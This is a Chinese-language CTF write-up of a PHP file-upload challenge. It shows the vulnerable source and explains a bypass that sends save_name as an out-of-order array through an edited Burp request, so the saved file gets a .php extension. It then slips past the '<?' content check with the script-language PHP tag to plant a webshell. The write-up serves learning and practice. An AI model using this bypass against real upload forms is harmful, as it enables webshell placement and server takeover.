朋友发的一个ctf题,做了好久才做出来,记录一下。
0x01 源码
<?php
highlight_file(__FILE__);
@mkdir("./upload");
if (isset($_POST['submit'])) {
$is_upload = false;
$text = null;
if(!empty($_FILES['upload_file'])){
$allow_type = array('image/jpeg','image/png','image/gif');
if(!in_array($_FILES['upload_file']['type'],$allow_type)){
$text = "type forbidden";
}else{
$file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
$temp_name = $_FILES['upload_file']['tmp_name'];
if (!is_array($file)) {
$file = explode('.', strtolower($file));
}
$ext = end($file);
$allow_suffix = array('jpg','png','gif');
if (!in_array($ext, $allow_suffix)) {
$text = "ext forbidden";
}else{
$file_name = reset($file) . '.' . $file[count($file) - 1];
$img_path = "./upload" . '/' .$file_name;
if (mb_strpos(file_get_contents($_FILES['upload_file']['tmp_name']), "<?") !== FALSE) {
$text = "hacker";
}else{
if(file_exists($img_path)){
$text = "file exist already";
}else{
if (move_uploaded_file($temp_name, $img_path)) {
$text = "upload succeed";
$is_upload = true;
} else {
$text = "upload failed";
}
}
}
}
}
}else{
$text = "please upload your file";
}
}
?>
0x02 代码初步分析
- 由于服务使用了php版本为
5.6.40,且容器为Apache,所以00截断用不了,其他的解析漏洞也用不上。 - 对上传文件的
Content-Type做了白名单限制,限制为图片类型,由于没有对文件内容进行校验,所以只需要把shell写到一个文本文件再重命名为jpg就行。 - 对文件后缀进行了白名单限制,限制只能为
jpg、png、gif。 - 对文件内容进行了检查,不允许文件内容中出现
<?。
0x03 代码深入分析
由于是ctf,所以这里必然有漏洞,做不出来就是知道的东西太少了。
由于php是弱类型语言,在字符串与数字进行比较时,会将字符串强制转换为数字再进行比较,所以:
php -r "echo 0=='jpg';"
1
但是基于multipart/form-data的POST请求得到的数据只能是文件或者字符串或者数组,不可能是数字,所以这个思路是不行的。
考虑到如下内容:
$ext = end($file);
$file_name = reset($file) . '.' . $file[count($file) - 1];
在已经获得$ext作为后缀名的情况下,没必要再通过$file来获取后缀名进行拼接。
考虑到这里的$file必须是个数组的情况下,explode()函数不可控,那么可以通过更改input标签中name的方式来将save_name修改为一个数组:
image.png
由于需要对后缀名进行校验,那么数组长度必然大于或等于2,
count($file) - 1的值只能为key是数组长度减1的值,但是此处不可控。经过多次测试:
<?php
$a[1] = 1;
$a[0] = 0;
echo end($a);
echo "<br>";
var_dump($a);
?>
//输出结果:
0
array(2) { [1]=> int(1) [0]=> int(0) }
php中手动用数字来定义的key,并不会按照从小到大的顺序进行存储,所以end()函数只会提取到数组最后定义的key对应的值,而通过数组长度减一得到的值就不一定和end()函数得到的值一致了。
当使用$a=[0,1]的写法时,end()函数得到的值与数组长度减一得到的值就又一致了。
采用绕过的答案如下:
#直接修改burp数据包:
Content-Disposition: form-data; name="save_name[1]"
1.php
-----------------------------6027882332248
Content-Disposition: form-data; name="save_name[0]"
jpg
php文件标记可以采用如下三种格式:
// 1.
<?php
?>
//2. 需要在php.ini中设置short_open_tag = On
<?
?>
//3.
<script language="php">
</script>
//4. 需要在php.ini中配置asp_tags = On ,一般默认是Off,7.0以上版本已移除这个配置
<%
%>
针对文件内容检查可采用第三种格式。
